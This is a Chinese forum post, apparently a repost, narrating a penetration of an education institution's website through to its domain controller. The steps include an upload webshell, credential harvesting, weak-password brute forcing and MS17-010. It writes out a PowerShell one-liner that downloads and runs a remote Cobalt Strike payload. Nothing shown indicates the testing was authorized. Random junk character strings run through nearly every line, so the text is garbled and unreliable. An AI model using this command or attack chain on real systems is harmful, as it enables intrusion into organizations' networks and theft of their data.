找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2033|回复: 0

渗透实战 | 从外网直接打到内网全过程

[复制链接]
发表于 2024-3-1 19:41:32 | 显示全部楼层 |阅读模式

8 l( m, k% H: J) M# A9 l 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路4 c- v. y1 w8 M& Z

$ [" k6 _4 @/ O9 q5 F! q

, \+ i. O) p; L  & q% g( |$ M+ w4 j3 l4 W* u

& j7 k1 y6 B- O

% c6 o% x8 ^0 q 正文 - }1 t F3 P7 X7 b" Q

5 {# R! V4 V4 r% b$ d; |4 x! _

5 n/ O8 o1 R8 P6 g7 O1 R& [   ' y0 T; W2 V0 Z/ l

! I# H* s/ i# h8 t* X3 d: c+ P# v

' t( @. p' ^8 q7 ^7 T" j 目标:www.xxxx.com(一家教育机构)
! O! p4 \7 `( ^9 T' u( f+ [
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
% {; ]# t$ @& ?( u, X2 l E

! U: W$ ^" o$ c, n: u% V" E) t

% u3 W$ n1 A9 Q$ @/ ? vshapes=) |" H. \! C# L

0 C1 t7 M+ R" w9 @% H f; N. ]* i

+ e3 Q* P @/ M) B2 l, X8 W 进行了简单的信息搜集
; d( R9 l V3 s4 j2 L
+ Z& i, z$ I7 V# \/ n
4 ~1 h3 t ]% I& j* Z1 U! O

6 B$ s+ F% Q4 q7 {- ~! F; y: j

9 U ~! N' J' N, W( _9 O" H 子域名搜集 1 T R) e8 [* Y4 M% u

! b! G, ^1 Y' h

# Y4 O( i, k' f9 a% Q7 G vshapes=" {# V2 q. L# B& u! V6 i

7 u; Z; {' s! m- P/ R, I

, {3 w' @' Q) {/ ] fofa找资产
% p; r. {$ F3 H/ J, ^
n" N( @7 G$ \+ P% R$ Q
+ G* H- }- Y$ X: r" M

) e/ |5 j V+ Y3 k. F

$ ^6 z6 J- M0 G vshapes= + q& D9 W1 w! d* V; h3 m7 [

( s# t: }: A" L% l- X

& ?6 b' l1 U. ^ 一共七个资产。去重之后只有两个。
% D1 _) }* H9 T/ ]
* Z' o! X+ ~+ @. q" U/ k6 t
! p. k9 Q, \5 p3 d' f: H& e$ ?7 ?! q

" B( G% ^% g6 k) `8 v1 \4 K8 P

7 {3 L) n9 m! [: F9 h! \; g 目录探测/ k4 s: N0 z, @. h$ u

# B$ b) {1 U: J- g

- }9 g' K- s2 B3 y vshapes=3 Y f* D+ n& L( v# f

) u3 z6 ^3 S- N# D7 |% b, K! T9 V. s

Z2 t+ a2 n5 x/ o) ? 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
9 A" q! q5 [2 O# i8 U. y
: K8 f2 e ]8 T F( s
4 G0 N% L: F. k

2 x q9 I5 I- V/ i5 y

! R: Q; O& b) n& G& U 我又尝试了通过修改返回包来绕过登录界面- b1 D+ I. R" ^, Z2 V% ~" t$ o9 i

6 A( W( B- P7 v; M' V) S

8 `6 x( [+ m$ } vshapes= ! o5 j* L- N4 u, |

/ S) H8 n) O! _+ t

; M5 H1 q7 C, t+ \- w+ ? 还是不行,尝试注入无果 & h4 F8 b4 I8 B j

% i6 \% ~- g2 c

& d1 ]+ y7 y5 D0 K vshapes= ' U6 S# s4 ~9 V6 z: M

1 r1 f& R2 K6 A3 t c6 n6 O/ y' V

7 @# K A7 s! D2 X9 B# x7 f 不过我目录探测出了一处Spring信息泄露
& E' J; m0 w/ j; n
! a. a$ \4 e5 ~* Q( T
/ D! s3 k c/ Q. T+ E/ z

& O& A& r$ }: p. Q; T6 r% o

: u, k9 q' a% T& d4 j5 a o' ` vshapes=) A7 ^) s3 I% ~# g

) M! a3 o6 g! o; w

4 J# g6 }( O* Q) n$ y 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 [5 j5 Y0 N2 X; z

, c. ~& \% @9 R V) V- S. u8 k

2 Y: V$ z6 E2 @ vshapes=& J0 V% N H1 h+ [4 u. X

- F6 O6 N; y1 d+ T& |7 L2 `

1 [- O% O2 q% V5 f! n' Z) u( K 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。& V. C8 X- \2 {3 z$ B$ V

* C* V* k \7 `( T. p) D. {+ T

9 ^: J. J5 S% ~ |* v' H vshapes=% }6 n; ^& \8 B2 M

" U( m0 P8 C m, J: P% `

- s! G w5 j; W& g% M4 X 获取有些师傅到这一步就手机抓包电脑测了。" \, B3 l7 R/ a& I* i$ d% ~, j

$ P4 ]9 Z) j$ j2 X+ y$ a

0 S. Y5 A$ J) S1 I" T1 b( h& U! d C Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。* P1 C( Y$ P' J( o1 r

! h6 i* W; N$ }' W6 O

& e- i0 Z7 ^5 V 其中在一个公众号发现了小程序,可以进行注册。( W6 J0 F$ ?; H2 _& O, c

0 I% {! v3 i/ G5 v

4 L7 Z) `, w/ I' L ^( {% H 看到了头像上传,尝试上传获取WebShell2 \2 w. n9 I* l' `& q$ b

6 b4 d6 f/ |" ]( j- E. ?# b

) F: A( P/ C8 ] m vshapes= 9 r! t% D& I/ y8 K( r

# ^! @# ]' V8 k4 w* M

0 y) K2 d6 ]$ x2 g$ t# W 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问( c6 C5 ?# t7 J. P

' ]. N; e& M3 Z) K, I2 b+ z

a' S6 ], Q' j2 T/ W, [7 y7 Y vshapes=! e8 R$ i1 u2 \6 B& T1 Y! j

. h' h& E# n6 S- x6 H! W K+ i

4 \ T9 H- w( j* r. m- ? 然后上了大马 ( d. g8 F5 @' b0 `( i

. ~( w9 {# Z- Y% j

3 j+ w9 c; d" E9 |4 e vshapes= & \* N1 O h0 f. B

$ R, E, F3 O, d8 U

+ H, E6 O" x; j5 ]+ F) g vshapes=8 E6 y. w: F( H' A$ I8 j. ^0 h1 u: N

, K' |& c: t0 F$ \3 i

, e' z$ Z& X" K 通过翻找文件发现数据库账号密码 - s3 [3 }% D! g9 F( w3 i

6 x* ^6 W* T3 x/ f

2 q! z0 K( Z: |: P5 u% z vshapes= 7 I8 u) h/ Z1 ]' F6 m

, l5 e: n* i2 _ X4 u1 ~

4 R3 P P4 E+ d T) M1 @ --内网渗透 % j3 K) n: L- r0 ~

- Z& s( _- g6 K2 o; o% r2 S* c' N

; y5 I4 F# a2 E 直接通过powershell执行 cs上线 + `2 K) u5 [6 a+ I

, o: |0 l2 `# I4 J

9 C N, ^( g+ s) |5 c( ^1 g' |$ v powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 0 C, F% ? z7 H% U; ^

8 I+ t+ U% o7 Z' Z

8 B* M6 `* d$ u* z$ G4 f5 @7 A vshapes= # t' \' P% B9 _. t

- E" J" G8 A, _8 u

: E* t7 _9 K' Y9 d! b) t 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 n; I o9 o( }- M

. G# C' U. P/ Z

; V' V2 w3 k( \% D; @% R vshapes= 3 ~/ V! F/ [' o2 s, m

5 {8 \5 w5 x2 a' X( \

; ~( e! [- T i% O; ^ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
$ u: n& S& O9 q# U7 |8 g
' b. K; x- Q. }; A
5 O" a, ]" ^, D0 X7 d
2 o' G& ?* m8 b/ x H2 u. @

# J% N' v k- `' B% R) G# v, `

. a% }: e" a/ j* Q4 w9 G9 I vshapes= ; ] X3 I* n9 {, T6 P! o, B5 y( X

) u! E4 T9 U" [. J* ?

, B0 r- h3 {5 j, B0 R 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
) t/ X8 _/ k x: }( H' x0 ?+ L! B
# A7 F5 H1 ^8 ]0 ^! W$ A! E
4 w: S; O* {) y6 j: S% g

9 S9 h: K) @8 ?$ y" ~7 b7 x4 D

* J( ?- q, t; W& l! L. Q vshapes=% Y: L* D# t, |- o3 W( Z9 c+ ^) U6 w

" A5 K. R2 p$ g% R! ^3 W* H

& ^/ O! z/ O% F k* C
/ m6 e+ ~* S1 b
. T; J o" f3 G3 ]6 H; Z
8 [8 Q `- Q' K! y9 X3 _9 ?

* l/ w4 r! k! F- o3 k

7 K. @' @+ V0 [9 n. ^/ c  0 K3 n' @8 w* e- N6 \

5 A5 H* d8 S: q- z5 ?: u# \, P8 C0 j& c

+ }( X x5 H# x+ D2 |7 Z X 小结 1 d4 N% E5 I3 k S

/ s! S6 a; \. x( ]' ]

- @! B# d8 D( E/ U4 m   ; v6 i% L- B P: \- o

- Q+ V6 h1 s: t" @- l

) [7 D7 O5 _' l" a 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!, [. z, l" |( m7 \7 Y7 c$ E$ V5 q

# |: F# U7 Z0 M

^' d# M, n! A" ?  0 ^. p2 r9 y; T* n

) N- p( X- x+ k6 D' Q4 Q6 w
    4 O0 U2 |2 B0 ^. y7 E
  • # y' c' [! N; }( }- Q) M  0 ]- q" X; E. W3 `
  • . B8 [8 |$ d9 y2 S @2 R
  • ( d/ m; V6 ?" r, u( {) x- w  6 ^& q$ t" W+ U& x) f
  • 1 _! z- _6 J4 `+ s9 I7 s8 ~ U2 d' m
) T, z) i |4 q& D& \ e

9 J3 R: Y3 d) m4 l7 L4 x* \( f 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html) M+ Y9 B0 v$ ?) {4 }

, I' F% \$ {6 ^/ x0 w& s$ ^/ F* j# R8 o

7 ^$ m0 X* F2 _* B: R$ g   Q1 w1 j8 z U7 J6 U

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表